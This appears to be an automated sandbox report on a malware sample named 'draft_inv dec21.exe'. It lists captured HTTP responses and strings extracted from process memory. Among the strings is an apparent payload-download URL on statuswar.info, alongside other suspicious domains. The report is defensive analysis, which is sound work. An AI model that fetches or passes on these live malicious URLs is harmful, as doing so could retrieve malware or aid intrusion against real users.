Source: global traffic HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Wed, 01 Dec 2021 09:34:09 GMTContent-Type: text/htmlContent-Length: 275ETag: "6192576d-113"Via: 1.1 googleConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlContent-Length: 1271Connection: closeDate: Wed, 01 Dec 2021 09:34:25 GMTServer: ApacheX-Frame-Options: denyData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 68 74 6d 6c 2c 20 62 6f 64 79 2c 20 23 70 61 72 74 6e 65 72 2c 20 69 66 72 61 6d 65 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6f 75 74 6c 69 6e 65 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 62 61 73 65 6c 69 6e 65 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 74 72 61 6e 73 70 61 72 65 6e 74 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 3c 2f 73 74 79 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 4e 4f 57 22 20 6e 61 6d 65 3d 22 65 78 70 69 72 65 73 22 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 2c 20 61 6c 6c 22 20 6e 61 6d 65 3d 22 47 4f 4f 47 4c 45 42 4f 54 22 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 2c 20 61 6c 6c 22 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 3e 0a 20 20 3c 21 2d 2d 20 46 6f 6c 6c 6f 77 69 6e 67 20 4d 65 74 61 2d 54 61 67 20 66 69 78 65 73 20 73 63 61 6c 69 6e 67 2d 69 73 73 75 65 73 20 6f 6e 20 6d 6f 62 69 6c 65 20 64 65 76 69 63 65 73 20 2d 2d 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 3b 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 3b 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 3b 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 30 3b 22 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 3e 0a 20 20 3c 64 69 76 20 69 64 3d 22 70 61 72 74 6e 65 72 22 3e 0a 20 20 3c 2f 64 69 76 3e 0a 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 28 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 27 3c 73 63 72 69 70 74 20 74 79 70 65 3d 2
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 01 Dec 2021 09:35:46 GMTContent-Type: text/htmlContent-Length: 146Connection: closeSet-Cookie: security_session_verify=eacd4aa794019e81ab3f3becff0d4bcf; expires=Sat, 04-Dec-21 17:35:46 GMT; path=/; HttpOnlyData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Wed, 01 Dec 2021 09:37:09 GMTContent-Type: text/htmlContent-Length: 275ETag: "618be735-113"Via: 1.1 googleConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Wed, 01 Dec 2021 09:39:17 GMTContent-Type: text/htmlContent-Length: 275ETag: "6192576d-113"Via: 1.1 googleConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 01 Dec 2021 09:39:56 GMTServer: Apache/2.4.29 (Ubuntu)Content-Length: 282Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 6c 6f 70 73 72 65 6e 74 61 6c 2e 6c 65 61 73 65 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at www.lopsrental.lease Port 80</address></body></html>
Source: unknown UDP traffic detected without corresponding DNS query: 9.9.9.9
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: svchost.exe, 0000000B.00000002.11095566235.0000000004D32000.00000004.00020000.sdmp String found in binary or memory: .www.linkedin.combscookie/ equals www.linkedin.com (Linkedin)
Source: svchost.exe, 0000000B.00000002.11095566235.0000000004D32000.00000004.00020000.sdmp String found in binary or memory: .www.linkedin.combscookie/+= equals www.linkedin.com (Linkedin)
Source: svchost.exe, 0000000B.00000002.11095566235.0000000004D32000.00000004.00020000.sdmp String found in binary or memory: .www.linkedin.combscookie//a equals www.linkedin.com (Linkedin)
Source: svchost.exe, 0000000B.00000002.11095222346.00000000041D2000.00000004.00020000.sdmp String found in binary or memory: http://181ue.com/sq.html?entry=
Source: draft_inv dec21.exe, 00000008.00000003.6723833827.00000000008A3000.00000004.00000001.sdmp, draft_inv dec21.exe, 00000008.00000003.6725673470.00000000008A3000.00000004.00000001.sdmp, draft_inv dec21.exe, 00000008.00000003.6726515151.000000000089F000.00000004.00000001.sdmp, draft_inv dec21.exe, 00000008.00000003.6726184531.0000000000896000.00000004.00000001.sdmp, draft_inv dec21.exe, 00000008.00000002.6920864857.00000000008A2000.00000004.00000001.sdmp, draft_inv dec21.exe, 00000008.00000003.6724195797.00000000008A3000.00000004.00000001.sdmp String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: draft_inv dec21.exe, 00000008.00000003.6723833827.00000000008A3000.00000004.00000001.sdmp, draft_inv dec21.exe, 00000008.00000003.6725673470.00000000008A3000.00000004.00000001.sdmp, draft_inv dec21.exe, 00000008.00000003.6726515151.000000000089F000.00000004.00000001.sdmp, draft_inv dec21.exe, 00000008.00000003.6726184531.0000000000896000.00000004.00000001.sdmp, draft_inv dec21.exe, 00000008.00000002.6920864857.00000000008A2000.00000004.00000001.sdmp, draft_inv dec21.exe, 00000008.00000003.6724195797.00000000008A3000.00000004.00000001.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: explorer.exe, 0000000A.00000000.7095220223.000000000DE22000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6766176363.0000000010AE3000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6812895943.000000000DE22000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6860287928.000000000DE22000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6763636920.000000000DE22000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6815284036.0000000010AE3000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6863015163.0000000010AE3000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.7097487639.0000000010AE3000.00000004.00000001.sdmp String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
Source: explorer.exe, 0000000A.00000000.6766176363.0000000010AE3000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6815284036.0000000010AE3000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6863015163.0000000010AE3000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.7097487639.0000000010AE3000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.digi
Source: explorer.exe, 0000000A.00000000.6762309173.000000000DD29000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.7093850961.000000000DD29000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6859178062.000000000DD29000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6811980327.000000000DD29000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTBL0V27RVZ7LBduom%2FnYB45SPUEwQU5Z1ZMIJHWMys%
Source: explorer.exe, 0000000A.00000000.7095220223.000000000DE22000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6766176363.0000000010AE3000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6812895943.000000000DE22000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6860287928.000000000DE22000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6763636920.000000000DE22000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6815284036.0000000010AE3000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6863015163.0000000010AE3000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.7097487639.0000000010AE3000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.digicert.com0:
Source: explorer.exe, 0000000A.00000000.6769023376.0000000011483000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6866481600.0000000011483000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6818418295.0000000011483000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/Omniroot2025.crl
Source: explorer.exe, 0000000A.00000000.6766176363.0000000010AE3000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6815284036.0000000010AE3000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6863015163.0000000010AE3000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.7097487639.0000000010AE3000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6866798303.00000000114C0000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6769282903.00000000114C0000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6818714689.00000000114C0000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.msocsp.com0
Source: explorer.exe, 0000000A.00000000.6850853985.000000000AAF0000.00000002.00020000.sdmp, explorer.exe, 0000000A.00000000.6849380205.0000000009F70000.00000002.00020000.sdmp, explorer.exe, 0000000A.00000000.6736651526.00000000033E0000.00000002.00020000.sdmp String found in binary or memory: http://schemas.micro
Source: UserOOBEBroker.exe, 00000003.00000002.11083878638.000002278EAB0000.00000002.00020000.sdmp String found in binary or memory: http://schemas.microso
Source: explorer.exe, 0000000A.00000000.6842091530.00000000055B4000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.7074720251.00000000055B4000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6793949002.00000000055B4000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6743868804.00000000055B4000.00000004.00000001.sdmp String found in binary or memory: http://www.foreca.com
Source: explorer.exe, 0000000A.00000000.6746304267.000000000993A000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6845108468.000000000993A000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6796864976.000000000993A000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.7078024608.000000000993A000.00000004.00000001.sdmp String found in binary or memory: https://aka.ms/odirm
Source: explorer.exe, 0000000A.00000000.6845627993.00000000099AD000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6746869625.00000000099AD000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6797467749.00000000099AD000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.7078654239.00000000099AD000.00000004.00000001.sdmp String found in binary or memory: https://api.msn.com/
Source: explorer.exe, 0000000A.00000000.7090429730.000000000D913000.00000004.00000001.sdmp String found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
Source: explorer.exe, 0000000A.00000000.6810627291.000000000DBDD000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6857788973.000000000DBDD000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6760638241.000000000DBDD000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.7092262614.000000000DBDD000.00000004.00000001.sdmp String found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?
Source: explorer.exe, 0000000A.00000000.6842091530.00000000055B4000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.7074720251.00000000055B4000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6793949002.00000000055B4000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6743868804.00000000055B4000.00000004.00000001.sdmp String found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=5696A836803C42E0B53F7BB2770E5342&timeOut=10000&o
Source: explorer.exe, 0000000A.00000000.6842091530.00000000055B4000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.7077199847.0000000009896000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6844291725.0000000009896000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.7074720251.00000000055B4000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6745620416.0000000009896000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6793949002.00000000055B4000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6743868804.00000000055B4000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6796095372.0000000009896000.00000004.00000001.sdmp String found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
Source: explorer.exe, 0000000A.00000000.6846488668.0000000009A5F000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.7079654654.0000000009A5F000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6747800110.0000000009A5F000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6798490214.0000000009A5F000.00000004.00000001.sdmp String found in binary or memory: https://arc.msn.com
Source: explorer.exe, 0000000A.00000000.6842091530.00000000055B4000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.7074720251.00000000055B4000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6793949002.00000000055B4000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6743868804.00000000055B4000.00000004.00000001.sdmp String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/svg/72/MostlySunnyDay.svg
Source: explorer.exe, 0000000A.00000000.7087565531.000000000D6B0000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6755416072.000000000D6B0000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6806548919.000000000D6B0000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6853693363.000000000D6B0000.00000004.00000001.sdmp String found in binary or memory: https://contentstorage.osi.office.net/dynamiccanvas/licensingui/index.html?mode=NewDeviceActivation
Source: explorer.exe, 0000000A.00000000.7087565531.000000000D6B0000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6755416072.000000000D6B0000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6806548919.000000000D6B0000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6853693363.000000000D6B0000.00000004.00000001.sdmp String found in binary or memory: https://contentstorage.osi.office.net/dynamiccanvas/licensingui/index.html?mode=NewDeviceActivation8
Source: explorer.exe, 0000000A.00000000.6846488668.0000000009A5F000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.7079654654.0000000009A5F000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6747800110.0000000009A5F000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6798490214.0000000009A5F000.00000004.00000001.sdmp String found in binary or memory: https://excel.office.comv
Source: explorer.exe, 0000000A.00000000.6846488668.0000000009A5F000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6769343918.00000000114CB000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.7079654654.0000000009A5F000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6866893237.00000000114CB000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6747800110.0000000009A5F000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6818792515.00000000114CB000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6798490214.0000000009A5F000.00000004.00000001.sdmp String found in binary or memory: https://ims-na1.adobelogin.com/ims/authorize/v1?locale=en_us&client_id=AdobeReader9&redirect_uri=htt
Source: svchost.exe, 0000000B.00000002.11088928256.00000000034A6000.00000004.00000001.sdmp String found in binary or memory: https://login.live.com/
Source: svchost.exe, 0000000B.00000002.11088928256.00000000034A6000.00000004.00000001.sdmp String found in binary or memory: https://login.live.com//
Source: svchost.exe, 0000000B.00000002.11088928256.00000000034A6000.00000004.00000001.sdmp String found in binary or memory: https://login.live.com/v104
Source: explorer.exe, 0000000A.00000000.6769023376.0000000011483000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6866481600.0000000011483000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6818418295.0000000011483000.00000004.00000001.sdmp String found in binary or memory: https://odc.officeapps.live.com/odc/v2.1/hrd?lcid=1033&syslcid=2057&uilcid=1033&app=0&ver=16&build=1
Source: explorer.exe, 0000000A.00000000.6846488668.0000000009A5F000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.7079654654.0000000009A5F000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6747800110.0000000009A5F000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6798490214.0000000009A5F000.00000004.00000001.sdmp String found in binary or memory: https://outlook.comUser6
Source: explorer.exe, 0000000A.00000000.6846488668.0000000009A5F000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.7079654654.0000000009A5F000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6747800110.0000000009A5F000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6798490214.0000000009A5F000.00000004.00000001.sdmp String found in binary or memory: https://powerpoint.office.comEM8
Source: svchost.exe, 0000000B.00000002.11095222346.00000000041D2000.00000004.00020000.sdmp String found in binary or memory: https://pre-mpnewyear.uc.cn/iceberg/page/log?domain=
Source: draft_inv dec21.exe, 00000008.00000002.6920468519.0000000000871000.00000004.00000020.sdmp String found in binary or memory: https://statuswar.info/
Source: draft_inv dec21.exe, 00000008.00000002.6920468519.0000000000871000.00000004.00000020.sdmp String found in binary or memory: https://statuswar.info/1
Source: draft_inv dec21.exe, 00000008.00000002.6920230335.0000000000852000.00000004.00000020.sdmp String found in binary or memory: https://statuswar.info/GHDFR/bin_rOlFDOAa61.bin
Source: draft_inv dec21.exe, 00000008.00000002.6920468519.0000000000871000.00000004.00000020.sdmp String found in binary or memory: https://statuswar.info/GHDFR/bin_rOlFDOAa61.bin#
Source: draft_inv dec21.exe, 00000008.00000002.6920230335.0000000000852000.00000004.00000020.sdmp String found in binary or memory: https://statuswar.info/GHDFR/bin_rOlFDOAa61.bin9
Source: draft_inv dec21.exe, 00000008.00000002.6920230335.0000000000852000.00000004.00000020.sdmp String found in binary or memory: https://statuswar.info/GHDFR/bin_rOlFDOAa61.binO
Source: draft_inv dec21.exe, 00000008.00000002.6919966464.0000000000828000.00000004.00000020.sdmp String found in binary or memory: https://statuswar.info/GHDFR/bin_rOlFDOAa61.binZ
Source: svchost.exe, 0000000B.00000002.11095222346.00000000041D2000.00000004.00020000.sdmp String found in binary or memory: https://track.uc.cn/collect
Source: explorer.exe, 0000000A.00000000.6842091530.00000000055B4000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.7074720251.00000000055B4000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6793949002.00000000055B4000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6743868804.00000000055B4000.00000004.00000001.sdmp String found in binary or memory: https://windows.msn.com:443/shell
Source: explorer.exe, 0000000A.00000000.7087565531.000000000D6B0000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6755416072.000000000D6B0000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6806548919.000000000D6B0000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6853693363.000000000D6B0000.00000004.00000001.sdmp String found in binary or memory: https://word.office.com
Source: svchost.exe, 0000000B.00000002.11095222346.00000000041D2000.00000004.00020000.sdmp String found in binary or memory: https://www.avto-click.com/n8ds/?gHl=36nvuDOhb
Source: explorer.exe, 0000000A.00000000.7092992649.000000000DC71000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6761388755.000000000DC71000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6787904265.00000000033F0000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6867008814.00000000114D9000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6858399983.000000000DC71000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6736702475.00000000033F0000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6811191351.000000000DC71000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6835881125.00000000033F0000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.7066893065.00000000033F0000.00000004.00000001.sdmp String found in binary or memory: https://www.digicert.com/CPS0
Source: explorer.exe, 0000000A.00000000.6769023376.0000000011483000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6866481600.0000000011483000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6818418295.0000000011483000.00000004.00000001.sdmp String found in binary or memory: https://www.msn.com/?ocid=iehp
